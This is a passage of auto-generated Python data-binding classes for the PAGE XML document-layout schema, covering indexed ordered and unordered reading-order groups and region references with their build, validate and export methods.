MemberSpec_('RegionRefIndexed', 'RegionRefIndexedType', 1, 0, {'name': 'RegionRefIndexed', 'type': 'RegionRefIndexedType'}, 3),
MemberSpec_('OrderedGroupIndexed', 'OrderedGroupIndexedType', 1, 0, {'name': 'OrderedGroupIndexed', 'type': 'OrderedGroupIndexedType'}, 3),
MemberSpec_('UnorderedGroupIndexed', 'UnorderedGroupIndexedType', 1, 0, {'name': 'UnorderedGroupIndexed', 'type': 'UnorderedGroupIndexedType'}, 3),
]
subclass = None
superclass = None
def __init__(self, id=None, regionRef=None, index=None, caption=None, type_=None, continuation=None, custom=None, comments=None, UserDefined=None, Labels=None, RegionRefIndexed=None, OrderedGroupIndexed=None, UnorderedGroupIndexed=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.regionRef = _cast(None, regionRef)
self.regionRef_nsprefix_ = None
self.index = _cast(int, index)
self.index_nsprefix_ = None
self.caption = _cast(None, caption)
self.caption_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.continuation = _cast(bool, continuation)
self.continuation_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
if RegionRefIndexed is None:
self.RegionRefIndexed = []
else:
self.RegionRefIndexed = RegionRefIndexed
self.RegionRefIndexed_nsprefix_ = "pc"
if OrderedGroupIndexed is None:
self.OrderedGroupIndexed = []
else:
self.OrderedGroupIndexed = OrderedGroupIndexed
self.OrderedGroupIndexed_nsprefix_ = "pc"
if UnorderedGroupIndexed is None:
self.UnorderedGroupIndexed = []
else:
self.UnorderedGroupIndexed = UnorderedGroupIndexed
self.UnorderedGroupIndexed_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, OrderedGroupIndexedType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if OrderedGroupIndexedType.subclass:
return OrderedGroupIndexedType.subclass(*args_, **kwargs_)
else:
return OrderedGroupIndexedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_RegionRefIndexed(self):
return self.RegionRefIndexed
def set_RegionRefIndexed(self, RegionRefIndexed):
self.RegionRefIndexed = RegionRefIndexed
def add_RegionRefIndexed(self, value):
self.RegionRefIndexed.append(value)
def insert_RegionRefIndexed_at(self, index, value):
self.RegionRefIndexed.insert(index, value)
def replace_RegionRefIndexed_at(self, index, value):
self.RegionRefIndexed[index] = value
def get_OrderedGroupIndexed(self):
return self.OrderedGroupIndexed
def set_OrderedGroupIndexed(self, OrderedGroupIndexed):
self.OrderedGroupIndexed = OrderedGroupIndexed
def add_OrderedGroupIndexed(self, value):
self.OrderedGroupIndexed.append(value)
def insert_OrderedGroupIndexed_at(self, index, value):
self.OrderedGroupIndexed.insert(index, value)
def replace_OrderedGroupIndexed_at(self, index, value):
self.OrderedGroupIndexed[index] = value
def get_UnorderedGroupIndexed(self):
return self.UnorderedGroupIndexed
def set_UnorderedGroupIndexed(self, UnorderedGroupIndexed):
self.UnorderedGroupIndexed = UnorderedGroupIndexed
def add_UnorderedGroupIndexed(self, value):
self.UnorderedGroupIndexed.append(value)
def insert_UnorderedGroupIndexed_at(self, index, value):
self.UnorderedGroupIndexed.insert(index, value)
def replace_UnorderedGroupIndexed_at(self, index, value):
self.UnorderedGroupIndexed[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_regionRef(self):
return self.regionRef
def set_regionRef(self, regionRef):
self.regionRef = regionRef
def get_index(self):
return self.index
def set_index(self, index):
self.index = index
def get_caption(self):
return self.caption
def set_caption(self, caption):
self.caption = caption
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_continuation(self):
return self.continuation
def set_continuation(self, continuation):
self.continuation = continuation
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def validate_GroupTypeSimpleType(self, value):
# Validate type pc:GroupTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['paragraph', 'list', 'list-item', 'figure', 'article', 'div', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GroupTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.UserDefined is not None or
self.Labels or
self.RegionRefIndexed or
self.OrderedGroupIndexed or
self.UnorderedGroupIndexed
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='OrderedGroupIndexedType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('OrderedGroupIndexedType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'OrderedGroupIndexedType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='OrderedGroupIndexedType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='OrderedGroupIndexedType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='OrderedGroupIndexedType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.regionRef is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
if self.caption is not None and 'caption' not in already_processed:
already_processed.add('caption')
outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.continuation is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='OrderedGroupIndexedType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
for RegionRefIndexed_ in self.RegionRefIndexed:
namespaceprefix_ = self.RegionRefIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRefIndexed_nsprefix_) else ''
RegionRefIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRefIndexed', pretty_print=pretty_print)
for OrderedGroupIndexed_ in self.OrderedGroupIndexed:
namespaceprefix_ = self.OrderedGroupIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroupIndexed_nsprefix_) else ''
OrderedGroupIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroupIndexed', pretty_print=pretty_print)
for UnorderedGroupIndexed_ in self.UnorderedGroupIndexed:
namespaceprefix_ = self.UnorderedGroupIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroupIndexed_nsprefix_) else ''
UnorderedGroupIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroupIndexed', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('regionRef', node)
if value is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
self.regionRef = value
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
self.index = self.gds_parse_integer(value, node, 'index')
value = find_attr_value_('caption', node)
if value is not None and 'caption' not in already_processed:
already_processed.add('caption')
self.caption = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_GroupTypeSimpleType(self.type_) # validate type GroupTypeSimpleType
value = find_attr_value_('continuation', node)
if value is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
if value in ('true', '1'):
self.continuation = True
elif value in ('false', '0'):
self.continuation = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
elif nodeName_ == 'RegionRefIndexed':
obj_ = RegionRefIndexedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.RegionRefIndexed.append(obj_)
obj_.original_tagname_ = 'RegionRefIndexed'
elif nodeName_ == 'OrderedGroupIndexed':
obj_ = OrderedGroupIndexedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.OrderedGroupIndexed.append(obj_)
obj_.original_tagname_ = 'OrderedGroupIndexed'
elif nodeName_ == 'UnorderedGroupIndexed':
obj_ = UnorderedGroupIndexedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnorderedGroupIndexed.append(obj_)
obj_.original_tagname_ = 'UnorderedGroupIndexed'
# end class OrderedGroupIndexedType
class UnorderedGroupIndexedType(GeneratedsSuper):
"""Indexed group containing unordered elements
Optional link to a parent region of nested regions.
The parent region doubles as reading order group.
Only the nested regions should be allowed as group members.
Position (order number) of this item within the
current hierarchy level.
Is this group a continuation of another group
(from previous column or page, for example)?
For generic use"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('regionRef', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('index', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('type_', 'pc:GroupTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
MemberSpec_('RegionRef', 'RegionRefType', 1, 0, {'name': 'RegionRef', 'type': 'RegionRefType'}, 4),
MemberSpec_('OrderedGroup', 'OrderedGroupType', 1, 0, {'name': 'OrderedGroup', 'type': 'OrderedGroupType'}, 4),
MemberSpec_('UnorderedGroup', 'UnorderedGroupType', 1, 0, {'name': 'UnorderedGroup', 'type': 'UnorderedGroupType'}, 4),
]
subclass = None
superclass = None
def __init__(self, id=None, regionRef=None, index=None, caption=None, type_=None, continuation=None, custom=None, comments=None, UserDefined=None, Labels=None, RegionRef=None, OrderedGroup=None, UnorderedGroup=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.regionRef = _cast(None, regionRef)
self.regionRef_nsprefix_ = None
self.index = _cast(int, index)
self.index_nsprefix_ = None
self.caption = _cast(None, caption)
self.caption_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.continuation = _cast(bool, continuation)
self.continuation_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
if RegionRef is None:
self.RegionRef = []
else:
self.RegionRef = RegionRef
self.RegionRef_nsprefix_ = "pc"
if OrderedGroup is None:
self.OrderedGroup = []
else:
self.OrderedGroup = OrderedGroup
self.OrderedGroup_nsprefix_ = "pc"
if UnorderedGroup is None:
self.UnorderedGroup = []
else:
self.UnorderedGroup = UnorderedGroup
self.UnorderedGroup_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, UnorderedGroupIndexedType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if UnorderedGroupIndexedType.subclass:
return UnorderedGroupIndexedType.subclass(*args_, **kwargs_)
else:
return UnorderedGroupIndexedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_RegionRef(self):
return self.RegionRef
def set_RegionRef(self, RegionRef):
self.RegionRef = RegionRef
def add_RegionRef(self, value):
self.RegionRef.append(value)
def insert_RegionRef_at(self, index, value):
self.RegionRef.insert(index, value)
def replace_RegionRef_at(self, index, value):
self.RegionRef[index] = value
def get_OrderedGroup(self):
return self.OrderedGroup
def set_OrderedGroup(self, OrderedGroup):
self.OrderedGroup = OrderedGroup
def add_OrderedGroup(self, value):
self.OrderedGroup.append(value)
def insert_OrderedGroup_at(self, index, value):
self.OrderedGroup.insert(index, value)
def replace_OrderedGroup_at(self, index, value):
self.OrderedGroup[index] = value
def get_UnorderedGroup(self):
return self.UnorderedGroup
def set_UnorderedGroup(self, UnorderedGroup):
self.UnorderedGroup = UnorderedGroup
def add_UnorderedGroup(self, value):
self.UnorderedGroup.append(value)
def insert_UnorderedGroup_at(self, index, value):
self.UnorderedGroup.insert(index, value)
def replace_UnorderedGroup_at(self, index, value):
self.UnorderedGroup[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_regionRef(self):
return self.regionRef
def set_regionRef(self, regionRef):
self.regionRef = regionRef
def get_index(self):
return self.index
def set_index(self, index):
self.index = index
def get_caption(self):
return self.caption
def set_caption(self, caption):
self.caption = caption
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_continuation(self):
return self.continuation
def set_continuation(self, continuation):
self.continuation = continuation
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def validate_GroupTypeSimpleType(self, value):
# Validate type pc:GroupTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['paragraph', 'list', 'list-item', 'figure', 'article', 'div', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GroupTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.UserDefined is not None or
self.Labels or
self.RegionRef or
self.OrderedGroup or
self.UnorderedGroup
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnorderedGroupIndexedType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('UnorderedGroupIndexedType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'UnorderedGroupIndexedType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UnorderedGroupIndexedType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UnorderedGroupIndexedType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UnorderedGroupIndexedType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.regionRef is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
if self.caption is not None and 'caption' not in already_processed:
already_processed.add('caption')
outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.continuation is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnorderedGroupIndexedType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
for RegionRef_ in self.RegionRef:
namespaceprefix_ = self.RegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRef_nsprefix_) else ''
RegionRef_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRef', pretty_print=pretty_print)
for OrderedGroup_ in self.OrderedGroup:
namespaceprefix_ = self.OrderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroup_nsprefix_) else ''
OrderedGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroup', pretty_print=pretty_print)
for UnorderedGroup_ in self.UnorderedGroup:
namespaceprefix_ = self.UnorderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroup_nsprefix_) else ''
UnorderedGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroup', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('regionRef', node)
if value is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
self.regionRef = value
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
self.index = self.gds_parse_integer(value, node, 'index')
value = find_attr_value_('caption', node)
if value is not None and 'caption' not in already_processed:
already_processed.add('caption')
self.caption = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_GroupTypeSimpleType(self.type_) # validate type GroupTypeSimpleType
value = find_attr_value_('continuation', node)
if value is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
if value in ('true', '1'):
self.continuation = True
elif value in ('false', '0'):
self.continuation = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
elif nodeName_ == 'RegionRef':
obj_ = RegionRefType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.RegionRef.append(obj_)
obj_.original_tagname_ = 'RegionRef'
elif nodeName_ == 'OrderedGroup':
obj_ = OrderedGroupType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.OrderedGroup.append(obj_)
obj_.original_tagname_ = 'OrderedGroup'
elif nodeName_ == 'UnorderedGroup':
obj_ = UnorderedGroupType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnorderedGroup.append(obj_)
obj_.original_tagname_ = 'UnorderedGroup'
# end class UnorderedGroupIndexedType
class RegionRefType(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('regionRef', 'string', 0, 0, {'use': 'required'}),
]
subclass = None
superclass = None
def __init__(self, regionRef=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.regionRef = _cast(None, regionRef)
self.regionRef_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, RegionRefType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if RegionRefType.subclass:
return RegionRefType.subclass(*args_, **kwargs_)
else:
return RegionRefType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_regionRef(self):
return self.regionRef
def set_regionRef(self, regionRef):
self.regionRef = regionRef
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionRefType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('RegionRefType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'RegionRefType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RegionRefType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RegionRefType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RegionRefType'):
if self.regionRef is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionRefType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('regionRef', node)
if value is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
self.regionRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class RegionRefType
class OrderedGroupType(GeneratedsSuper):
"""Numbered group (contains ordered elements)
Optional link to a parent region of nested regions.
The parent region doubles as reading order group.
Only the nested regions should be allowed as group members.
Is this group a continuation of another group
(from previous column or page, for example)?
For generic use"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('regionRef', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
